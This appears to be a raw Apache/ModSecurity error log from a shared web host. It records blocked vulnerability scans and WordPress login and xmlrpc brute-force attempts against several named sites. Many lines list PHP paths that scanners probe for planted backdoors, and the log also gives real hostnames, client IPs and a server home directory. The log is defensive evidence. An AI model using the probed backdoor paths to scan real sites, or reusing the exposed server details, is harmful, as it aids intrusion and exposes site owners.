[Tue May 26 13:52:54.718108 2026] [security2:error] [pid 555743:tid 555946] [client 185.92.25.98:50215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/autoload_classmap.php"] [unique_id "ahVYXsjqAquC0YaxQjC9iAAAAVM"]
[Tue May 26 13:52:55.052221 2026] [security2:error] [pid 555743:tid 555978] [client 185.192.71.232:27823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/web.php"] [unique_id "ahVYX8jqAquC0YaxQjC9jwAAAXM"]
[Tue May 26 13:52:55.147219 2026] [security2:error] [pid 555743:tid 555922] [client 106.192.248.115:53276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYXsjqAquC0YaxQjC9jgAAATs"]
[Tue May 26 13:52:55.147371 2026] [security2:error] [pid 555743:tid 555922] [client 106.192.248.115:53276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYXsjqAquC0YaxQjC9jgAAATs"]
[Tue May 26 13:52:55.474576 2026] [security2:error] [pid 560287:tid 560486] [client 91.230.225.168:20257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/ocean/about.php"] [unique_id "ahVYX5mX5s6sDS3wJVceVwAAAMU"]
[Tue May 26 13:52:55.833351 2026] [security2:error] [pid 555743:tid 555885] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYX8jqAquC0YaxQjC9mwAAARY"]
[Tue May 26 13:52:55.862802 2026] [security2:error] [pid 555743:tid 555912] [client 185.92.25.136:56803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/index.php"] [unique_id "ahVYX8jqAquC0YaxQjC9owAAATE"]
[Tue May 26 13:52:56.652885 2026] [security2:error] [pid 555743:tid 555990] [client 185.92.25.101:24277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/bypass.php"] [unique_id "ahVYYMjqAquC0YaxQjC9rgAAAX8"]
[Tue May 26 13:52:56.812892 2026] [security2:error] [pid 560287:tid 560389] [remote 46.101.75.237:40996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVYYJmX5s6sDS3wJVceYgAAl2Q"]
[Tue May 26 13:52:57.025146 2026] [security2:error] [pid 555743:tid 555889] [client 185.92.25.95:41633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.well-known/gecko-litespeed.php"] [unique_id "ahVYYcjqAquC0YaxQjC9tAAAARo"]
[Tue May 26 13:52:57.417732 2026] [security2:error] [pid 560287:tid 560424] [client 185.192.71.243:22919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/midnight/install.php"] [unique_id "ahVYYZmX5s6sDS3wJVcebgAAAIs"]
[Tue May 26 13:52:57.499173 2026] [security2:error] [pid 560287:tid 560423] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYYZmX5s6sDS3wJVcebAAAAIo"]
[Tue May 26 13:52:58.408435 2026] [security2:error] [pid 560287:tid 560482] [client 185.192.71.235:59615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-trackback.php"] [unique_id "ahVYYpmX5s6sDS3wJVcefQAAAME"]
[Tue May 26 13:52:58.642485 2026] [security2:error] [pid 560287:tid 560400] [remote 91.210.171.209:49932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVYYpmX5s6sDS3wJVcefwAAom8"]
[Tue May 26 13:52:58.759422 2026] [security2:error] [pid 560287:tid 560529] [client 185.92.25.98:43377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/style-engine/bypass.php"] [unique_id "ahVYYpmX5s6sDS3wJVcegQAAAO8"]
[Tue May 26 13:52:59.278372 2026] [security2:error] [pid 560287:tid 560444] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYYpmX5s6sDS3wJVcehQAAAJ4"]
[Tue May 26 13:53:00.223489 2026] [security2:error] [pid 560287:tid 560485] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYY5mX5s6sDS3wJVcenAAAAMQ"]
[Tue May 26 13:53:00.325276 2026] [security2:error] [pid 555743:tid 555967] [client 185.92.25.137:21769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/radio.php"] [unique_id "ahVYZMjqAquC0YaxQjC95QAAAWg"]
[Tue May 26 13:53:00.881551 2026] [security2:error] [pid 555743:tid 555897] [client 91.230.225.167:56837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/mah.php"] [unique_id "ahVYZMjqAquC0YaxQjC99AAAASI"]
[Tue May 26 13:53:01.278833 2026] [security2:error] [pid 560287:tid 560484] [client 91.230.225.175:57853] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/dummyyummy/wp-signup.php"] [unique_id "ahVYZZmX5s6sDS3wJVceowAAAMM"]
[Tue May 26 13:53:01.460450 2026] [security2:error] [pid 555743:tid 555954] [client 64.233.173.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVYZMjqAquC0YaxQjC98wAAAVs"]
[Tue May 26 13:53:01.985959 2026] [security2:error] [pid 560287:tid 560546] [client 185.192.71.235:31011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/css/colors/midnight/wp-login.php"] [unique_id "ahVYZZmX5s6sDS3wJVceqAAAAP4"]
[Tue May 26 13:53:02.560215 2026] [security2:error] [pid 560287:tid 560293] [remote 139.84.229.194:42054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.229.84.139.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVYZpmX5s6sDS3wJVcezQAA0QU"]
[Tue May 26 13:53:02.794127 2026] [security2:error] [pid 560287:tid 560431] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYZpmX5s6sDS3wJVcezAAAAJI"]
[Tue May 26 13:53:03.691690 2026] [security2:error] [pid 555743:tid 555958] [client 129.222.147.134:3696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYZ8jqAquC0YaxQjC-GAAAAV8"]
[Tue May 26 13:53:03.691895 2026] [security2:error] [pid 555743:tid 555958] [client 129.222.147.134:3696] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYZ8jqAquC0YaxQjC-GAAAAV8"]
[Tue May 26 13:53:03.906881 2026] [security2:error] [pid 555743:tid 555973] [client 185.192.71.234:36577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-conflg.php"] [unique_id "ahVYZ8jqAquC0YaxQjC-GwAAAW4"]
[Tue May 26 13:53:04.266148 2026] [security2:error] [pid 555743:tid 555883] [client 185.192.71.228:47017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-setup.php"] [unique_id "ahVYaMjqAquC0YaxQjC-IwAAARQ"]
[Tue May 26 13:53:04.470450 2026] [security2:error] [pid 555743:tid 555902] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYaMjqAquC0YaxQjC-IAAAASc"]
[Tue May 26 13:53:05.677577 2026] [security2:error] [pid 560287:tid 560547] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYaZmX5s6sDS3wJVcfMQAAAP8"]
[Tue May 26 13:53:05.734455 2026] [security2:error] [pid 560287:tid 560532] [client 106.192.248.115:53585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYaZmX5s6sDS3wJVcfOgAAAPI"]
[Tue May 26 13:53:05.738614 2026] [security2:error] [pid 560287:tid 560532] [client 106.192.248.115:53585] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYaZmX5s6sDS3wJVcfOgAAAPI"]
[Tue May 26 13:53:05.795436 2026] [security2:error] [pid 555743:tid 555887] [client 91.230.225.165:53503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/ms-themes.php"] [unique_id "ahVYacjqAquC0YaxQjC-OAAAARg"]
[Tue May 26 13:53:06.070977 2026] [security2:error] [pid 560287:tid 560514] [client 14.165.79.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYaZmX5s6sDS3wJVcfOQAAAOA"]
[Tue May 26 13:53:06.267842 2026] [security2:error] [pid 560287:tid 560497] [client 185.92.25.101:29881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/assets/about.php"] [unique_id "ahVYapmX5s6sDS3wJVcfQQAAANA"]
[Tue May 26 13:53:07.034247 2026] [security2:error] [pid 560287:tid 560464] [client 185.192.71.234:21069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/style.php"] [unique_id "ahVYa5mX5s6sDS3wJVcfUwAAALE"]
[Tue May 26 13:53:07.401088 2026] [security2:error] [pid 560287:tid 560446] [client 185.92.25.136:46107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/infi.php"] [unique_id "ahVYa5mX5s6sDS3wJVcfXQAAAKA"]
[Tue May 26 13:53:07.822442 2026] [security2:error] [pid 560287:tid 560449] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYa5mX5s6sDS3wJVcfXwAAAKM"]
[Tue May 26 13:53:07.862423 2026] [security2:error] [pid 555743:tid 555960] [client 185.192.71.239:28407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/maint/index.php"] [unique_id "ahVYa8jqAquC0YaxQjC-VgAAAWE"]
[Tue May 26 13:53:08.406481 2026] [security2:error] [pid 555743:tid 555978] [client 91.230.225.170:45875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 170.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/x.php"] [unique_id "ahVYbMjqAquC0YaxQjC-YgAAAXM"]
[Tue May 26 13:53:08.914780 2026] [security2:error] [pid 555743:tid 555966] [client 185.192.71.228:36465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/IXR/index.php"] [unique_id "ahVYbMjqAquC0YaxQjC-awAAAWc"]
[Tue May 26 13:53:08.921537 2026] [core:crit] [pid 555743:tid 555991] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:53:09.409349 2026] [security2:error] [pid 560287:tid 560543] [client 185.192.71.231:60661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/css/index.php"] [unique_id "ahVYbZmX5s6sDS3wJVcfcAAAAPs"]
[Tue May 26 13:53:09.939170 2026] [security2:error] [pid 555743:tid 555920] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYbcjqAquC0YaxQjC-dwAAATk"]
[Tue May 26 13:53:10.054586 2026] [core:crit] [pid 560287:tid 560498] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:53:10.795168 2026] [core:crit] [pid 560287:tid 560541] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:53:10.891638 2026] [security2:error] [pid 560287:tid 560451] [client 91.230.225.178:29131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/index22.php"] [unique_id "ahVYbpmX5s6sDS3wJVcfmwAAAKU"]
[Tue May 26 13:53:12.286453 2026] [security2:error] [pid 555743:tid 555960] [client 91.230.225.165:62539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-user.php"] [unique_id "ahVYcMjqAquC0YaxQjC-kgAAAWE"]
[Tue May 26 13:53:13.288449 2026] [security2:error] [pid 560287:tid 560496] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYcJmX5s6sDS3wJVcfzQAAAM8"]
[Tue May 26 13:53:13.542822 2026] [security2:error] [pid 560287:tid 560427] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYcZmX5s6sDS3wJVcf1AAAAI4"]
[Tue May 26 13:53:13.954105 2026] [security2:error] [pid 560287:tid 560549] [client 129.222.147.134:37442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYcZmX5s6sDS3wJVcf6AAAAQE"]
[Tue May 26 13:53:13.957865 2026] [security2:error] [pid 560287:tid 560549] [client 129.222.147.134:37442] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYcZmX5s6sDS3wJVcf6AAAAQE"]
[Tue May 26 13:53:14.589740 2026] [security2:error] [pid 560287:tid 560492] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYcpmX5s6sDS3wJVcf7AAAAMs"]
[Tue May 26 13:53:14.817037 2026] [security2:error] [pid 560287:tid 560433] [client 185.92.25.101:29933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/pomo/about.php"] [unique_id "ahVYcpmX5s6sDS3wJVcf-wAAAJQ"]
[Tue May 26 13:53:14.821836 2026] [security2:error] [pid 555743:tid 555970] [client 216.244.66.241:54258] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/intermercurialfbcd/bcffcb1868373.shtml"] [unique_id "ahVYcsjqAquC0YaxQjC-rgAAAWs"]
[Tue May 26 13:53:14.821946 2026] [security2:error] [pid 555743:tid 555970] [client 216.244.66.241:54258] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/intermercurialfbcd/bcffcb1868373.shtml"] [unique_id "ahVYcsjqAquC0YaxQjC-rgAAAWs"]
[Tue May 26 13:53:15.157243 2026] [security2:error] [pid 555743:tid 555940] [client 64.31.3.126:43493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.3.31.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVYcsjqAquC0YaxQjC-rwAAAU0"], referer: https://www.cagmedya.com/
[Tue May 26 13:53:15.184604 2026] [security2:error] [pid 560287:tid 560514] [client 185.92.25.106:43073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/pomo/index.php"] [unique_id "ahVYc5mX5s6sDS3wJVcf_gAAAOA"]
[Tue May 26 13:53:15.502052 2026] [security2:error] [pid 555743:tid 555985] [client 68.183.88.172:42260] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "agsnails.com"] [uri "/"] [unique_id "ahVYc8jqAquC0YaxQjC-twAAAXo"]
[Tue May 26 13:53:15.551720 2026] [security2:error] [pid 560287:tid 560502] [client 185.192.71.226:61169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/config.php"] [unique_id "ahVYc5mX5s6sDS3wJVcf_wAAANQ"]
[Tue May 26 13:53:15.893378 2026] [security2:error] [pid 560287:tid 560525] [client 106.192.248.115:53900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYc5mX5s6sDS3wJVcgBgAAAOs"]
[Tue May 26 13:53:15.893575 2026] [security2:error] [pid 560287:tid 560525] [client 106.192.248.115:53900] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYc5mX5s6sDS3wJVcgBgAAAOs"]
[Tue May 26 13:53:15.926966 2026] [security2:error] [pid 560287:tid 560460] [client 91.230.225.168:32223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/special.php"] [unique_id "ahVYc5mX5s6sDS3wJVcgBwAAAK0"]
